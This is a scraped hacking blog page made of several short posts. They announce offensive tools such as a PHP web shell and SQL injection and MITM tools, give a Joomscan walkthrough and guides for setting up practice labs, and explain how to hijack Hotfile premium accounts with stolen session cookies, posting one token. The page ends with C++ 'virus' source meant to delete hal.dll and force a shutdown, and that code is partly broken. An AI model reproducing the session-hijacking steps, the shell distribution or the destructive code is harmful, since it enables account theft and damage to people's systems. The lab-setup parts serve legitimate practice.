jSQL Injection, a Java GUI for database injection

An easy to use SQL injection tool for retrieving database informations from a distant server.

jSQL Injection features:

* GET, POST, header, cookie methods
* visual, errorbase, blind algorithms
* automatic best algorithms detection
* data retrieving progression
* proxy setting


For now supports MySQL.

Running injection requires the distant server url and the name of parameter to inject.


Download jSQLi  :            LINK 1

WSO New update 2.5.1 (PHP WebShell ) -Download now

This utility provides a Web interface for remote operation c operating system and its service / daemon.

Features:


* Authorization for the cookies
* Server Information
* File manager (copy, rename, move, delete, chmod, touch, create files and folders)
* View, hexview, editing, downloading, uploading files
* Working with zip archives (packing, unpacking) + compression tar.gz
* Console
* SQL Manager (MySql, PostgreSql)
* Execute PHP code
* Working with Strings + hash search online databases
* Bindport and back-Connect (Perl)
* Bruteforce FTP, MySQL, PgSQL
* Search files, search text in files
* Support for * nix-like and Windows systems
* Antipoiskovik (check User-Agent, if a search engine then returns 404 error)
* You can use AJAX
* Small size. Packaged version is 22.8 Kb
* The choice of encoding, which employs a shell.


Changelog (v2.5.1):

Remove comments from the first line .
Added option to dump certain columns of tables.
the size of large files are now well defined .
in the file properties field "Create time" changed to "Change time" (http://php.net/filectime).
Fixed a bug that caused not working mysql brute force if there was a port of the server .
Fixed a bug due to which one can not see the contents of a table called download in the database.

Download it from here:      LINK 1          LINK 2

Burp Suite Free Edition v1.5 released

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:

An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware Spider, for crawling content and functionality.
An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual requests.
A Sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.


This is a significant upgrade with a wealth of new features added since
v1.4, most notably:


Completely new user interface with numerous usability enhancements.
Several new Proxy listener options, to deal with unusual situations.
New payload types in Burp Intruder.
JSON support.
Support for streaming HTTP responses.
Support for Android SSL connections (device and emulator).
Numerous new session handling options.
Full contextual documentation within the software itself.



Download Burp Suite Free Edition v1.5:        LINK 1

SSLsplit: Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections.

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encryptednetwork connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both
IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs
forged X509v3 certificates on-the-fly, based on the original server certificate
subject DN and subjectAltName extension. SSLsplit fully supports Server Name
Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and
ECDHE cipher suites. SSLsplit can also use existing certificates of which the
private key is available, instead of generating forged ones. SSLsplit supports
NULL-prefix CN certificates and can deny OCSP requests in a generic way.

SSLsplit version 0.4.5 released on Nov 07, change logs are
- Add support for 2048 and 4096 bit Diffie-Hellman.
- Fix syslog error messages (issue #6).
- Fix threading issues in daemon mode (issue #5).
- Fix address family check in netfilter NAT lookup (issue #4).
- Fix build on recent glibc systems (issue #2).
- Minor code and build process improvements.


Download the SSLsplit:     LINK 1

OWASP Joomscan -Joomla vulnerability scanner identifies 673 vulnerabilities

Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS. The Updated version can detects 673 vulnerabilities . Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site.

DOWNLAOD JOOMACAN :              LINK 1

How to use Joomscan?

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?

Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS. TheUpdated version can detects 550 Vulnerabilities. Let me show how to use this joomscan in Backtrack5.

Download the Joomscan from here:
http://web-center.si/joomscan



Step 1: Moving to PenTest folder

Copy/Move the downloaded files in directory

/pentest/web/scanners/joomscan/

Step2: Set Permission

Now you have to set permission for the Joomscan file. In order to this, Type the following command in Terminal(if you don't know how to open terminal at all, please stop reading this and start it from basics of Linux).

CHMOD 0777 joomscan.pl

Step 3: Update

Update the scanner to latest version. To do this, enter the following command in Terminal:

./joomscan.pl update

Step 4: Scanning for Vulnerability

Now everything ok, we have to scan our joomla site for vulnerability. To do this, enter the following command in Terminal:

./joomscan.pl -u www.YourJoomlasite.com

Wait for a while, and it will list of the vulnerability found.

How to Use Premium Cookies?edit cookies in any websites

In my last post i have explain how to hack the hotfile cookies and download like a premium account user(this article is example of cookie editing). Here is the general tutorial to add or edit premium cookies.

Requirements:

Web Developer Add on



Step 1: Install Web Developer Add on
Install the Web developer add on. Using this add on we are going to edit the cookies

https://addons.mozilla.org/en-US/firefox/addon/web-developer/
Restart the browser. now you can see the web developer toolbar. It consist of Disbale, cookies,css,forms....etc.

Step 2: Visit website
Visit the appropriate website corresponding to your premium cookies.

Step 3:
Now click the Cookies option in the Web developer tool bar. and select View Cookies information. It will show list of cookies.

For adding cookies click the "Add the cookie" in the toolbar instead. then skip to the step 6.

Step 4: Find the cookie
Find the cookie that you want to edit. Some website store login cookie as "auth" cookie. So find the auth cookie.

Step 5: Edit the cookie
click the edit the cookie link.
this will popup the cookie window

Step 6:

paste the premium cookies in the value field

If you are adding cookies manually, cookie name will be blank. So you have to set the correct cookie name also. usually it will be "auth"

Increase the Download speed of Hotfile like premium account-cookies hack

Hi Friends, i think this is my first about hotfile. Hotfile is file sharing website. In hotfile , downloading speed for normal user is very slow. But for premium account it will be faster. In this post, i am going to explain how to downlod files from hotfile like premium account.


Here is video Version of this tutorial:
How to use Premium cookies? Video Tutorial

In this method, we are going to use the premium cookies(cookie got from cookie stealing method). Website detects the user based on the cookies. cookies is only factor that detects whether you are normal user or premium user. More details aboutsession and cookies. So Using the Premium cookies , you can make the website to believe that you are the premium user. Sounds good..!! but how to do? This can achieved by Cookies Editing.


Method 1:  Requirements:


normal Free account in Hotfile
Premium cookies
Install Web Developer Add on

Step 1: Install Web Developer Add on
Install the Web developer add on. Using this add on we are going to edit the cookies


https://addons.mozilla.org/en-US/firefox/addon/web-developer/Restart the browser. now you can see the web developer toolbar. It consist of Disbale, cookies,css,forms....etc. We are going to use cookies option alone for this hack.

Step 2: Login with Free account

Login to your Free account in Hotfile.com

Step 3:
I hope you are in hotfile.com. Now click the Cookies option in the Web developer tool bar. and select View Cookies information. It will list of cookies.

Step 4: Find auth cookie
Find the cookie that named as "auth". (you can see this if you are login ).


Step 5: Edit cookie
Click the Edit cookie link. It will open the new pop up window.

Step 6: Change the Value
Now Delete the contents of Value Label. Paste the premium cookie that you have inside the value text field. and Click ok.

Step 7: What is the next step?
You are now premium member.!!! Start to download hot file like a premium member. Enjoy..!!!


Method 2:

Method 2 is same as method 1. Instead of editing cookie , we just add new cookie. So for this method, no need of free account also.


Visit hotfile.com
Click the cookie option as said in the above method.
Select Add cookie
It will open the small pop up window.
enter "auth" in the name field
Paste the premium cookies in the "Value" field.
Reload the page
That's all you finished.

Both methods works perfectly.
Having doubts ..??!! Post comments here.


Here is the one premium cookie for you:(copy it to your desktop, i will delete as soon as possible)

4afa81803373a6e2c29fcc1f782f8161d327c529eaa4e124e6eff19a822bfe9b

How to Hack Premium Accounts using Cookies? | Free Hacking Video Tutorials

We are to glad to say, We are releasing our First Free Hacking Video Tutorials. If you wan this tutorial in plain text with Screen shots, Please Follow this link:

How to Use Premium Cookies?


Hacking Video Tutorial:

Cookies Editing - Web Developer Mozilla Addon

Today i am going to introduce a mozilla add on which will very helpful for web developers (for hackers also).

Features:

View/Add/Edit Cookies
Clear cookies
Disable image in website
Disable java script in website
Disable css in website
more...

Download and install the add on from here:

https://addons.mozilla.org/en-US/firefox/addon/60

or try this

https://addons.mozilla.org/en-US/firefox/addon/web-developer/

What is Session in computer World? Magic Cookies

What is Session?
HTTP communicates with lot of TCP connections, Server should create unique identifer for each Connection.


A Session is a unique identifier that is generated and sent to the client from a server in order to identify the Current Interaction Session.
Whenever you visit a webpage or login to website, the server will store the data about you in your system as a cookie. This cookies will help to identify you.

For example , you are login to Facebook.com. when you login to your account, a cookie will be generated and stored in your local system. if you click the logout, cookies will be destroyed.


Software Implementation:
TCP sessions are implemented using Multi threading concept. Whenever session is generated , a new thread will be created.

HTTP sessions are typically not implemented using one thread per session, but by means of a database with information about the state of each session.

Server side web sessions:
The sessions are stored in Server Machine.

Client side web sessions:
Client-side sessions use cookies . This will reduce the server side storage.

This is best method but there is one drawback. Sessions stored in client is vulnerable to tampering by the hackers. This can be overcome by encrypting the session(but hackers are able to decrypt it also).

HTTP session token

The client usually stores and sends the token as an HTTP cookie and/or sends it as a parameter in GET or POST queries.

The reason to use session tokens is that the client only has to handle the identifier. All session data is stored on the server (usually in a database, to which the client does not have direct access) linked to that identifier.


Magic cookie is simply a cookie that is used to authenticate the user on remote server or simply computer. In general, cookies are used to maintain the sessions on the websites and store the remote address of the website.

Ethical Hacking Lab to Test and Learn SQL injection,XSS, CSRF Vulnerability

So far i have provided few Web Application Pen Testing tutorials . Now it is time to for practicing your hacking / pentesting skills in legal way. Last time , i explained about the Damn Vulnerable Web Application(DVWA).

Now, i've come with different web application that will help you to improve your knowledge in web app pentesting.


The BodgeIt Store

Like DVWA, This is also a Vulnerable web Application that will help you to develop your skills in Pen testing.

With this Vulnerable Application , you can practice the Following attacks:

Cross Site Scripting (XSS)
SQL injection (SQLi)
Hidden (but unprotected) content
Cross Site Request Forgery
Debug code
Insecure Object References
Application logic vulnerabilities

There is also a 'scoring' page (linked from the 'About Us' page) where you can see various hacking challenges and whether you have completed them or not.

How to setup the Pen Testing Lab?


Requirements:

BodgeIt app(download)
Tomcat server

Download the bodgeit.1.3.0.zip file and extract the zip file . Now you will get a WAR file(bodgeit.WAR).

step 1:Install the Tomcat
Install the Tomcat in your system. If you don't know how to do install the tomcat , do google search.

Step 2: Start the server
Start the tomcat server.

In Ubuntu, type the following command in Terminal:

sudo /etc/init.d/tomcat6 start

For windows users, just click the tomcat server in all programs.

Step 3:
Open the browser and type "localhost:8080". It will show a page "It works !". There you can access the manager webapp(http://localhost:8080/manager/html) page. Clicking the link will ask to enter the username and password. enter your computer username and password.

Step 4:
Now you are in "Tomcat Web Application Manager" page. Scroll down and there you can see theWAR file to deploy form.

Step 5: Deploying the WAR
click the Browse button and select the bodgeit.WAR file . Now click the Deploy button.

Yes, Now the Application successfully installed..

Access the BodgeIt in this location: http://localhost:8080/bodgeit/

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking

I hope you learned about the Sql injection and XSS from BTS. But you may curious to practice the SQLi and XSS attacks. we know that doing the attack on third-party website is crime. So how can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi vulnerabilities.

When i surf in the internet, i come to know about the "Damn Vulnerable Web App (DVWA)". It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal way.

Download this web Application from here:
http://www.dvwa.co.uk/

For Installing the this application, you will need XAMPP server.

The installation procedure :

Using this application , you can also practice:


* LFI /RFI (File Inclusion methods)
* Command Execution
* Upload Script
* Login Brute Force

How to create a Big size file ?

You can create a big size file using windows default command prompt itself. Why we need huge size file? When you create virus or you can use in your college for occupying the memory.

First of all Decide the Size of huge file. For eg, if you decide 1 milliion byte,then we should convert it to Hexadecimal format. Use the Windows Calculator in Scientific mode to convert to Hexadecimal.



we are planned to create 1 million byte sized file. So,Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the filesize reaches eight digits 000F4240.


* Now goto start->run
* Enter "cmd" to open the window.
* Enter the command DEBUG BIGFILE.DAT and ignore the File not found message.
* Type RCX and press Enter.
* Debug will display a colon prompt.
* Enter the last four digits of the hexadecimal number you calculated (4240, in our example).
* Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in          ourexample).
* Enter W for Write and Q for Quit.
* You've just created a 1-million-byte file using Debug.
* Of course you can create a file of any desired size using the same technique.

C++ virus that deletes the hal.dll file in system32

Hi in this article i will give you the c++ virus code. Don't use for any illegal purpose. This is just for learning purpose only.


#include<stdio.h>
#include<stdlib.h>

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

Above code will find the system32 folder and deletes the "hal.dll" file